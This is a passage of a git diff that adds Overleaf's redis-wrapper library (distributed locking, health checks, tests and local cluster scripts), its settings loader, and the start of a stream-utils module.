this.rclient.exists(key, (err, exists) => { + if (err != null) { + return callback(err) + } + exists = parseInt(exists) + if (exists === 1) { + metrics.inc(this.metricsPrefix + '-blocking') + return callback(null, false) + } else { + metrics.inc(this.metricsPrefix + '-not-blocking') + return callback(null, true) + } + }) + } + + /** + * @param {Callback} callback + */ + releaseLock(id, lockValue, callback) { + const key = this.getKey(id) + return this.rclient.eval( + UNLOCK_SCRIPT, + 1, + key, + lockValue, + (err, result) => { + if (err != null) { + return callback(err) + } else if (result != null && result !== 1) { + // successful unlock should release exactly one key + logger.error( + { id, key, lockValue, redis_err: err, redis_result: result }, + 'unlocking error' + ) + metrics.inc(this.metricsPrefix + '-unlock-error') + return callback(new Error('tried to release timed out lock')) + } else { + return callback(null, result) + } + } + ) + } +} diff --git a/libraries/redis-wrapper/RedisWebLocker.js b/libraries/redis-wrapper/RedisWebLocker.js new file mode 100644 index 0000000..dac315b --- /dev/null +++ b/libraries/redis-wrapper/RedisWebLocker.js @@ -0,0 +1,207 @@ +const { callbackify, promisify } = require('node:util') +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const os = require('node:os') +const crypto = require('node:crypto') +const async = require('async') + +const HOST = os.hostname() +const PID = process.pid +const RND = crypto.randomBytes(4).toString('hex') +let COUNT = 0 + +const LOCK_QUEUES = new Map() // queue lock requests for each name/id so they get the lock on a first-come first-served basis + +const UNLOCK_SCRIPT = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end' + +module.exports = class RedisWebLocker { + constructor({ rclient, getKey, options }) { + this.rclient = rclient + this.getKey = getKey + + // ms between each test of the lock + this.LOCK_TEST_INTERVAL = options.lockTestInterval || 50 + // back off to ms between each test of the lock + this.MAX_TEST_INTERVAL = options.maxTestInterval || 1000 + // ms maximum time to spend trying to get the lock + this.MAX_LOCK_WAIT_TIME = options.maxLockWaitTime || 10000 + // seconds. Time until lock auto expires in redis + this.REDIS_LOCK_EXPIRY = options.redisLockExpiry || 30 + // ms, if execution takes longer than this then log + this.SLOW_EXECUTION_THRESHOLD = options.slowExecutionThreshold || 5000 + // read-only copy for unit tests + this.unlockScript = UNLOCK_SCRIPT + + const promisifiedRunWithLock = promisify(this.runWithLock).bind(this) + this.promises = { + runWithLock(namespace, id, runner) { + const cbRunner = callbackify(runner) + return promisifiedRunWithLock(namespace, id, cbRunner) + }, + } + } + + // Use a signed lock value as described in + // http://redis.io/topics/distlock#correct-implementation-with-a-single-instance + // to prevent accidental unlocking by multiple processes + randomLock() { + const time = Date.now() + return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}` + } + + runWithLock(namespace, id, runner, callback) { + // runner must be a function accepting a callback, e.g. runner = (cb) -> + + // This error is defined here so we get a useful stacktrace + const slowExecutionError = new Error('slow execution during lock') + + const timer = new metrics.Timer(`lock.${namespace}`) + const key = this.getKey(namespace, id) + this._getLock(key, namespace, (error, lockValue) => { + if (error != null) { + return callback(error) + } + + // The lock can expire in redis but the process carry on. This setTimeout call + // is designed to log if this happens. + function countIfExceededLockTimeout() { + metrics.inc(`lock.${namespace}.exceeded_lock_timeout`) + logger.debug('exceeded lock timeout', { + namespace, + id, + slowExecutionError, + }) + } + const exceededLockTimeout = setTimeout( + countIfExceededLockTimeout, + this.REDIS_LOCK_EXPIRY * 1000 + ) + + runner((error1, ...values) => + this._releaseLock(key, lockValue, error2 => { + clearTimeout(exceededLockTimeout) + + const timeTaken = new Date() - timer.start + if (timeTaken > this.SLOW_EXECUTION_THRESHOLD) { + logger.debug('slow execution during lock', { + namespace, + id, + timeTaken, + slowExecutionError, + }) + } + + timer.done() + error = error1 || error2 + if (error != null) { + return callback(error) + } + callback(null, ...values) + }) + ) + }) + } + + _tryLock(key, namespace, callback) { + const lockValue = this.randomLock() + this.rclient.set( + key, + lockValue, + 'EX', + this.REDIS_LOCK_EXPIRY, + 'NX', + (err, gotLock) => { + if (err != null) { + return callback(err) + } + if (gotLock === 'OK') { + metrics.inc(`lock.${namespace}.try.success`) + callback(err, true, lockValue) + } else { + metrics.inc(`lock.${namespace}.try.failed`) + logger.debug({ key, redis_response: gotLock }, 'lock is locked') + callback(err, false) + } + } + ) + } + + // it's sufficient to serialize within a process because that is where the parallel operations occur + _getLock(key, namespace, callback) { + // this is what we need to do for each lock we want to request + const task = next => + this._getLockByPolling(key, namespace, (error, lockValue) => { + // tell the queue to start trying to get the next lock (if any) + next() + // we have got a lock result, so we can continue with our own execution + callback(error, lockValue) + }) + // create a queue for this key if needed + const queueName = `${key}:${namespace}` + let queue = LOCK_QUEUES.get(queueName) + if (queue == null) { + const handler = (fn, cb) => fn(cb) + // set up a new queue for this key + queue = async.queue(handler, 1) + queue.push(task) + // remove the queue object when queue is empty + queue.drain(() => { + LOCK_QUEUES.delete(queueName) + }) + // store the queue in our global map + LOCK_QUEUES.set(queueName, queue) + } else { + // queue the request to get the lock + queue.push(task) + } + } + + _getLockByPolling(key, namespace, callback) { + const startTime = Date.now() + const testInterval = this.LOCK_TEST_INTERVAL + let attempts = 0 + const attempt = () => { + if (Date.now() - startTime > this.MAX_LOCK_WAIT_TIME) { + metrics.inc(`lock.${namespace}.get.failed`) + return callback(new Error('Timeout')) + } + + attempts += 1 + this._tryLock(key, namespace, (error, gotLock, lockValue) => { + if (error != null) { + return callback(error) + } + if (gotLock) { + metrics.gauge(`lock.${namespace}.get.success.tries`, attempts) + callback(null, lockValue) + } else { + setTimeout(attempt, testInterval) + } + }) + } + attempt() + } + + _releaseLock(key, lockValue, callback) { + this.rclient.eval(this.unlockScript, 1, key, lockValue, (err, result) => { + if (err != null) { + callback(err) + } else if (result != null && result !== 1) { + // successful unlock should release exactly one key + logger.warn( + { key, lockValue, redis_err: err, redis_result: result }, + 'unlocking error' + ) + metrics.inc('unlock-error') + callback(new Error('tried to release timed out lock')) + } else { + callback(null, result) + } + }) + } + + _lockQueuesSize() { + return LOCK_QUEUES.size + } +} diff --git a/libraries/redis-wrapper/buildscript.txt b/libraries/redis-wrapper/buildscript.txt new file mode 100644 index 0000000..89de514 --- /dev/null +++ b/libraries/redis-wrapper/buildscript.txt @@ -0,0 +1,10 @@ +redis-wrapper +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/redis-wrapper/index.js b/libraries/redis-wrapper/index.js new file mode 100644 index 0000000..2e16014 --- /dev/null +++ b/libraries/redis-wrapper/index.js @@ -0,0 +1,173 @@ +const crypto = require('node:crypto') +const os = require('node:os') +const { promisify } = require('node:util') + +const Redis = require('ioredis') + +const { + RedisHealthCheckTimedOut, + RedisHealthCheckWriteError, + RedisHealthCheckVerifyError, +} = require('./Errors') + +const HEARTBEAT_TIMEOUT = 2000 + +// generate unique values for health check +const HOST = os.hostname() +const PID = process.pid +const RND = crypto.randomBytes(4).toString('hex') +let COUNT = 0 + +function createClient(opts) { + const standardOpts = Object.assign({}, opts) + delete standardOpts.key_schema + + if (standardOpts.retry_max_delay == null) { + standardOpts.retry_max_delay = 5000 // ms + } + + if (standardOpts.endpoints) { + throw new Error( + '@overleaf/redis-wrapper: redis-sentinel is no longer supported' + ) + } + + let client + if (standardOpts.cluster) { + delete standardOpts.cluster + client = new Redis.Cluster(opts.cluster, standardOpts) + } else { + client = new Redis(standardOpts) + } + monkeyPatchIoRedisExec(client) + client.healthCheck = callback => { + if (callback) { + // callback based invocation + healthCheck(client).then(callback).catch(callback) + } else { + // Promise based invocation + return healthCheck(client) + } + } + return client +} + +async function healthCheck(client) { + // check the redis connection by storing and retrieving a unique key/value pair + const uniqueToken = `host=${HOST}:pid=${PID}:random=${RND}:time=${Date.now()}:count=${COUNT++}` + + // o-error context + const context = { + uniqueToken, + stage: 'add context for a timeout', + } + + await runWithTimeout({ + runner: runCheck(client, uniqueToken, context), + timeout: HEARTBEAT_TIMEOUT, + context, + }) +} + +async function runCheck(client, uniqueToken, context) { + const healthCheckKey = `_redis-wrapper:healthCheckKey:{${uniqueToken}}` + const healthCheckValue = `_redis-wrapper:healthCheckValue:{${uniqueToken}}` + + // set the unique key/value pair + context.stage = 'write' + const writeAck = await client + .set(healthCheckKey, healthCheckValue, 'EX', 60) + .catch(err => { + throw new RedisHealthCheckWriteError('write errored', context, err) + }) + if (writeAck !== 'OK') { + context.writeAck = writeAck + throw new RedisHealthCheckWriteError('write failed', context) + } + + // check that we can retrieve the unique key/value pair + context.stage = 'verify' + const [roundTrippedHealthCheckValue, deleteAck] = await client + .multi() + .get(healthCheckKey) + .del(healthCheckKey) + .exec() + .catch(err => { + throw new RedisHealthCheckVerifyError( + 'read/delete errored', + context, + err + ) + }) + if (roundTrippedHealthCheckValue !== healthCheckValue) { + context.roundTrippedHealthCheckValue = roundTrippedHealthCheckValue + throw new RedisHealthCheckVerifyError('read failed', context) + } + if (deleteAck !== 1) { + context.deleteAck = deleteAck + throw new RedisHealthCheckVerifyError('delete failed', context) + } +} + +function unwrapMultiResult(result, callback) { + // ioredis exec returns a results like: + // [ [null, 42], [null, "foo"] ] + // where the first entries in each 2-tuple are + // presumably errors for each individual command, + // and the second entry is the result. We need to transform + // this into the same result as the old redis driver: + // [ 42, "foo" ] + // + // Basically reverse: + // https://github.com/luin/ioredis/blob/v4.17.3/lib/utils/index.ts#L75-L92 + const filteredResult = [] + for (const [err, value] of result || []) { + if (err) { + return callback(err) + } else { + filteredResult.push(value) + } + } + callback(null, filteredResult) +} +const unwrapMultiResultPromisified = promisify(unwrapMultiResult) + +function monkeyPatchIoRedisExec(client) { + const _multi = client.multi + client.multi = function () { + const multi = _multi.apply(client, arguments) + const _exec = multi.exec + multi.exec = callback => { + if (callback) { + // callback based invocation + _exec.call(multi, (error, result) => { + // The command can fail all-together due to syntax errors + if (error) return callback(error) + unwrapMultiResult(result, callback) + }) + } else { + // Promise based invocation + return _exec.call(multi).then(unwrapMultiResultPromisified) + } + } + return multi + } +} + +async function runWithTimeout({ runner, timeout, context }) { + let healthCheckDeadline + await Promise.race([ + new Promise((resolve, reject) => { + healthCheckDeadline = setTimeout(() => { + // attach the timeout when hitting the timeout only + context.timeout = timeout + reject(new RedisHealthCheckTimedOut('timeout', context)) + }, timeout) + }), + runner.finally(() => clearTimeout(healthCheckDeadline)), + ]) +} + +module.exports = { + createClient, +} diff --git a/libraries/redis-wrapper/package.json b/libraries/redis-wrapper/package.json new file mode 100644 index 0000000..2f15cb0 --- /dev/null +++ b/libraries/redis-wrapper/package.json @@ -0,0 +1,43 @@ +{ + "name": "@overleaf/redis-wrapper", + "version": "2.1.0", + "description": "Redis wrapper for node which will either use cluster or single instance redis", + "main": "index.js", + "files": [ + "index.js", + "Errors.js", + "RedisLocker.js", + "RedisWebLocker.js" + ], + "author": "Overleaf (https://www.overleaf.com)", + "repository": "github:overleaf/redis-wrapper", + "license": "ISC", + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "peerDependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*" + }, + "dependencies": { + "async": "^3.2.5", + "ioredis": "~4.27.1" + }, + "devDependencies": { + "@overleaf/logger": "*", + "@overleaf/o-error": "*", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } +} diff --git a/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh b/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh new file mode 100755 index 0000000..650630b --- /dev/null +++ b/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh @@ -0,0 +1,4 @@ +while true; do + seq 0 8 \ + | xargs -I% redis-cli -p 700% FLUSHALL > /dev/null +done diff --git a/libraries/redis-wrapper/test/scripts/cluster/cluster.js b/libraries/redis-wrapper/test/scripts/cluster/cluster.js new file mode 100644 index 0000000..58d6c79 --- /dev/null +++ b/libraries/redis-wrapper/test/scripts/cluster/cluster.js @@ -0,0 +1,26 @@ +/* + execute this script with a redis cluster running to test the health check. + starting and stopping shards with this script running is a good test. + + to create a new cluster, use $ ./create-redis-cluster.sh + to run a chaos monkey, use $ ./clear-dbs.sh +*/ + +const redis = require('../../../') +const logger = require('@overleaf/logger') + +const rclient = redis.createClient({ + cluster: Array.from({ length: 9 }).map((value, index) => { + return { host: '127.0.0.1', port: 7000 + index } + }), +}) + +setInterval(() => { + rclient.healthCheck(err => { + if (err) { + logger.error({ err }, 'HEALTH CHECK FAILED') + } else { + logger.info('HEALTH CHECK OK') + } + }) +}, 1000) diff --git a/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh b/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh new file mode 100755 index 0000000..dd384a2 --- /dev/null +++ b/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh @@ -0,0 +1,73 @@ +#!/bin/bash + +# USAGE: $0 [NUMBER_OF_NODES, default: 9] [DATA_DIR, default: a new temp dir] +# +# ports are assigned from 7000 on +# +# NOTE: the cluster setup requires redis 5+ + +set -ex + +COUNT=${1:-9} +DATA=$2 + +if [[ -z "$DATA" ]]; then + IS_TEMP=1 + TEMP=`mktemp -d` + DATA="$TEMP" +fi + +HAS_DATA= +if [[ -e "$DATA/7000/node.conf" ]]; then + HAS_DATA=1 +fi + +PIDs="" + +cleanup() { + # ensure that we delete the temp dir, no matter how the kill cmd exists + set +e + # invoke kill with at least one PID + echo "$PIDs" | xargs -r kill + if [[ ! -z "$IS_TEMP" ]]; then + rm -rf "$TEMP" + fi +} +trap cleanup exit + +for NUM in `seq "$COUNT"`; do + PORT=`expr 6999 + "$NUM"` + CWD="$DATA/$PORT" + mkdir -p "$CWD" + pushd "$CWD" + redis-server \ + --appendonly no \ + --cluster-enabled yes \ + --cluster-config-file node.conf \ + --port "$PORT" \ + --save "" \ + > /dev/null \ + & + PIDs="$PIDs $!" + popd +done + +# initial nodes +if [[ -z "$HAS_DATA" ]]; then + # confirm the setup + echo yes \ + | redis-cli --cluster create 127.0.0.1:7000 127.0.0.1:7001 127.0.0.1:7002 +fi + +# scale up as requested +for NUM in `seq 4 "$COUNT"`; do + PORT=`expr 6999 + "$NUM"` + GUARD="$DATA/$PORT/.joined" + if [[ ! -e "$GUARD" ]]; then + redis-cli --cluster add-node "127.0.0.1:$PORT" 127.0.0.1:7000 --cluster-slave + touch "$GUARD" + fi +done + +echo "CLUSTER IS READY" >&2 +wait diff --git a/libraries/redis-wrapper/test/scripts/standalone.js b/libraries/redis-wrapper/test/scripts/standalone.js new file mode 100644 index 0000000..1665e96 --- /dev/null +++ b/libraries/redis-wrapper/test/scripts/standalone.js @@ -0,0 +1,17 @@ +// execute this script with a redis container running to test the health check +// starting and stopping redis with this script running is a good test + +const redis = require('../../') +const logger = require('@overleaf/logger') + +const rclient = redis.createClient({ host: '127.0.0.1', port: '6379' }) + +setInterval(() => { + rclient.healthCheck(err => { + if (err) { + logger.error({ err }, 'HEALTH CHECK FAILED') + } else { + logger.info('HEALTH CHECK OK') + } + }) +}, 1000) diff --git a/libraries/redis-wrapper/test/setup.js b/libraries/redis-wrapper/test/setup.js new file mode 100644 index 0000000..6369c63 --- /dev/null +++ b/libraries/redis-wrapper/test/setup.js @@ -0,0 +1,9 @@ +const SandboxedModule = require('sandboxed-module') + +SandboxedModule.configure({ + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/redis-wrapper/test/unit/src/test.js b/libraries/redis-wrapper/test/unit/src/test.js new file mode 100644 index 0000000..a71dcf0 --- /dev/null +++ b/libraries/redis-wrapper/test/unit/src/test.js @@ -0,0 +1,219 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +require('chai').should() +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join(__dirname, './../../../index.js') +const redisLockerModulePath = path.join(__dirname, './../../../RedisLocker.js') +const { expect } = require('chai') + +describe('index', function () { + beforeEach(function () { + let Cluster, IoRedis, ioredisConstructor + this.settings = {} + this.ioredisConstructor = ioredisConstructor = sinon.stub() + + this.ioredis = IoRedis = (function () { + let createIoRedis + IoRedis = class IoRedis { + static initClass() { + this.prototype.on = sinon.stub() + createIoRedis = ioredisConstructor + } + + constructor() { + return createIoRedis.apply(this, arguments) + } + } + IoRedis.initClass() + return IoRedis + })() + this.ioredis.Cluster = Cluster = (function () { + Cluster = class Cluster { + static initClass() { + this.prototype.on = sinon.stub() + } + + constructor(config, options) { + this.config = config + this.options = options + } + } + Cluster.initClass() + return Cluster + })() + this.redis = SandboxedModule.require(modulePath, { + requires: { + ioredis: this.ioredis, + }, + globals: { + process, + Buffer, + }, + }) + this.auth_pass = '1234 pass' + + this.RedisLocker = SandboxedModule.require(redisLockerModulePath, { + requires: { + '@overleaf/metrics': { + inc() {}, + }, + }, + globals: { + process, + Math, + Buffer, + }, + }) + }) + + describe('lock TTL', function () { + it('should throw an error when creating a client with wrong type', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: '60', + }) + } + expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + + it('should throw an error when creating a client with small TTL', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: 1, + }) + } + expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + + it('should throw an error when creating a client with huge TTL', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: 30_000, + }) + } + expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + }) + + describe('redis-sentinel', function () { + it('should throw an error when creating a client', function () { + const redisSentinelOptions = { + endpoints: ['127.0.0.1:1234', '127.0.0.1:2345', '127.0.0.1:3456'], + } + const createNewClient = () => { + this.redis.createClient(redisSentinelOptions) + } + expect(createNewClient).to.throw( + '@overleaf/redis-wrapper: redis-sentinel is no longer supported' + ) + }) + }) + + describe('single node redis', function () { + beforeEach(function () { + return (this.standardOpts = { + auth_pass: this.auth_pass, + port: 1234, + host: 'redis.mysite.env', + }) + }) + + it('should work without opts', function () { + this.redis.createClient() + }) + + it('should use the ioredis driver in single-instance mode if a non array is passed', function () { + const client = this.redis.createClient(this.standardOpts) + return assert.equal(client.constructor, this.ioredis) + }) + + return it('should call createClient for the ioredis driver in single-instance mode if a non array is passed', function () { + this.redis.createClient(this.standardOpts) + return this.ioredisConstructor + .calledWith(sinon.match(this.standardOpts)) + .should.equal(true) + }) + }) + + describe('cluster', function () { + beforeEach(function () { + this.cluster = [{ mock: 'cluster' }, { mock: 'cluster2' }] + this.extraOptions = { keepAlive: 100 } + return (this.settings = { + cluster: this.cluster, + redisOptions: this.extraOptions, + key_schema: { + foo(x) { + return `${x}` + }, + }, + }) + }) + + it('should pass the options correctly though with no options', function () { + const client = this.redis.createClient({ cluster: this.cluster }) + assert(client instanceof this.ioredis.Cluster) + return client.config.should.deep.equal(this.cluster) + }) + + it('should not pass the key_schema through to the driver', function () { + const client = this.redis.createClient({ + cluster: this.cluster, + key_schema: 'foobar', + }) + assert(client instanceof this.ioredis.Cluster) + client.config.should.deep.equal(this.cluster) + return expect(client.options).to.deep.equal({ retry_max_delay: 5000 }) + }) + + return it('should pass the options correctly though with additional options', function () { + const client = this.redis.createClient(this.settings) + assert(client instanceof this.ioredis.Cluster) + client.config.should.deep.equal(this.cluster) + // need to use expect here because of _.clone in sandbox + return expect(client.options).to.deep.equal({ + redisOptions: this.extraOptions, + retry_max_delay: 5000, + }) + }) + }) + + return describe('monkey patch ioredis exec', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.results = [] + this.multiOrig = { exec: sinon.stub().yields(null, this.results) } + this.client = { multi: sinon.stub().returns(this.multiOrig) } + this.ioredisConstructor.returns(this.client) + this.redis.createClient(this.client) + return (this.multi = this.client.multi()) + }) + + it('should return the old redis format for an array', function () { + this.results[0] = [null, 42] + this.results[1] = [null, 'foo'] + this.multi.exec(this.callback) + return this.callback.calledWith(null, [42, 'foo']).should.equal(true) + }) + + return it('should return the old redis format when there is an error', function () { + this.results[0] = [null, 42] + this.results[1] = ['error', 'foo'] + this.multi.exec(this.callback) + return this.callback.calledWith('error').should.equal(true) + }) + }) +}) diff --git a/libraries/redis-wrapper/tsconfig.json b/libraries/redis-wrapper/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/redis-wrapper/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/settings/.gitignore b/libraries/settings/.gitignore new file mode 100644 index 0000000..06d8e1d --- /dev/null +++ b/libraries/settings/.gitignore @@ -0,0 +1,5 @@ +/.npmrc +/node_modules + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/settings/.nvmrc b/libraries/settings/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/settings/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/settings/LICENSE b/libraries/settings/LICENSE new file mode 100644 index 0000000..54a584e --- /dev/null +++ b/libraries/settings/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2014-2021 Overleaf + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/settings/README.md b/libraries/settings/README.md new file mode 100644 index 0000000..c06978b --- /dev/null +++ b/libraries/settings/README.md @@ -0,0 +1,19 @@ +@overleaf/settings +=================== + +A small module to allow global config settings to be set for all services +within the Overleaf architecture. + +Settings file location +---------------------- + +You can specify a custom location for the settings file by setting the +`OVERLEAF_CONFIG` environment variable. E.g. + + $ export OVERLEAF_CONFIG=/home/james/config/settings.development.js + +Otherwise, the settings will be loaded from `config/settings.NODE_ENV.js`, +where `NODE_ENV` is another environment variable, or defaults to `development`. + +The config directory is first looked for in the current directory, and then relative +to the settings module directory. diff --git a/libraries/settings/Settings.js b/libraries/settings/Settings.js new file mode 100644 index 0000000..3a5f31c --- /dev/null +++ b/libraries/settings/Settings.js @@ -0,0 +1,55 @@ +/* eslint-disable no-console */ +const fs = require('node:fs') +const Path = require('node:path') +const { merge } = require('./merge') + +const CWD = process.cwd() +const ENTRY_POINT_DIR = process.argv[1] + ? Path.dirname(process.argv[1]) + : undefined +const NODE_ENV = (process.env.NODE_ENV || 'development').toLowerCase() +const SHARELATEX_CONFIG = process.env.SHARELATEX_CONFIG +const OVERLEAF_CONFIG = process.env.OVERLEAF_CONFIG || SHARELATEX_CONFIG +if (SHARELATEX_CONFIG && SHARELATEX_CONFIG !== OVERLEAF_CONFIG) { + throw new Error( + 'found mismatching SHARELATEX_CONFIG, rename to OVERLEAF_CONFIG' + ) +} + +let settings +let settingsExist = false +const defaultsPath = + pathIfExists(Path.join(CWD, 'config/settings.defaults.cjs')) || + pathIfExists(Path.join(CWD, 'config/settings.defaults.js')) || + pathIfExists(Path.join(ENTRY_POINT_DIR, 'config/settings.defaults.cjs')) || + pathIfExists(Path.join(ENTRY_POINT_DIR, 'config/settings.defaults.js')) +if (defaultsPath) { + console.log(`Using default settings from ${defaultsPath}`) + settings = require(defaultsPath) + settingsExist = true +} else { + settings = {} +} + +const overridesPath = + pathIfExists(OVERLEAF_CONFIG) || + pathIfExists(Path.join(CWD, `config/settings.${NODE_ENV}.cjs`)) || + pathIfExists(Path.join(CWD, `config/settings.${NODE_ENV}.js`)) +if (overridesPath) { + console.log(`Using settings from ${overridesPath}`) + settings = merge(require(overridesPath), settings) + settingsExist = true +} + +if (!settingsExist) { + console.warn("No settings or defaults found. I'm flying blind.") +} + +module.exports = settings + +function pathIfExists(path) { + if (path && fs.existsSync(path)) { + return path + } + return null +} diff --git a/libraries/settings/buildscript.txt b/libraries/settings/buildscript.txt new file mode 100644 index 0000000..ed79480 --- /dev/null +++ b/libraries/settings/buildscript.txt @@ -0,0 +1,10 @@ +settings +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/settings/index.js b/libraries/settings/index.js new file mode 100755 index 0000000..a2cc75a --- /dev/null +++ b/libraries/settings/index.js @@ -0,0 +1 @@ +module.exports = require('./Settings') diff --git a/libraries/settings/merge.js b/libraries/settings/merge.js new file mode 100644 index 0000000..2e11a16 --- /dev/null +++ b/libraries/settings/merge.js @@ -0,0 +1,12 @@ +function merge(settings, defaults) { + for (const [key, value] of Object.entries(settings)) { + if (typeof value === 'object' && !(value instanceof Array)) { + defaults[key] = merge(value, defaults[key] || {}) + } else { + defaults[key] = value + } + } + return defaults +} + +module.exports = { merge } diff --git a/libraries/settings/package.json b/libraries/settings/package.json new file mode 100644 index 0000000..5ddb514 --- /dev/null +++ b/libraries/settings/package.json @@ -0,0 +1,21 @@ +{ + "name": "@overleaf/settings", + "description": "A centralised settings system for Overleaf", + "version": "3.0.0", + "repository": "overleaf/settings-module", + "main": "index.js", + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "devDependencies": { + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/settings/test/notests.js b/libraries/settings/test/notests.js new file mode 100644 index 0000000..62307e4 --- /dev/null +++ b/libraries/settings/test/notests.js @@ -0,0 +1 @@ +// There are no tests yet diff --git a/libraries/settings/tsconfig.json b/libraries/settings/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/settings/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/stream-utils/.gitignore b/libraries/stream-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/stream-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/stream-utils/.mocharc.json b/libraries/stream-utils/.mocharc.json new file mode 100644 index 0000000..3be9ee5 --- /dev/null +++ b/libraries/stream-utils/.mocharc.json @@ -0,0 +1,5 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec" +} diff --git a/libraries/stream-utils/.nvmrc b/libraries/stream-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/stream-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/stream-utils/buildscript.txt b/libraries/stream-utils/buildscript.txt new file mode 100644 index 0000000..ad72655 --- /dev/null +++ b/libraries/stream-utils/buildscript.txt @@ -0,0 +1,10 @@ +stream-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/stream-utils/index.js b/libraries/stream-utils/index.js new file mode 100644 index 0000000..e4c7d60 --- /dev/null +++ b/libraries/stream-utils/index.js @@ -0,0 +1,158 @@ +const { Writable, Readable, PassThrough, Transform } = require('node:stream') + +/** + * A writable stream that stores all data written to it in a node Buffer. + * @extends Writable + * @example + * const { WritableBuffer } = require('@overleaf/stream-utils') + * const bufferStream = new WritableBuffer() + * bufferStream.write('hello') + * bufferStream.write('world') + * bufferStream.end() + * bufferStream.contents().toString() // 'helloworld' + */ +class WritableBuffer extends Writable { + constructor(options) { + super(options) + this._buffers = [] + this._size = 0 + } + + _write(chunk, encoding, callback) { + this._buffers.push(chunk) + this._size += chunk.length + callback() + } + + _final(callback) { + callback() + } + + size() { + return this._size + } + + getContents() { + return 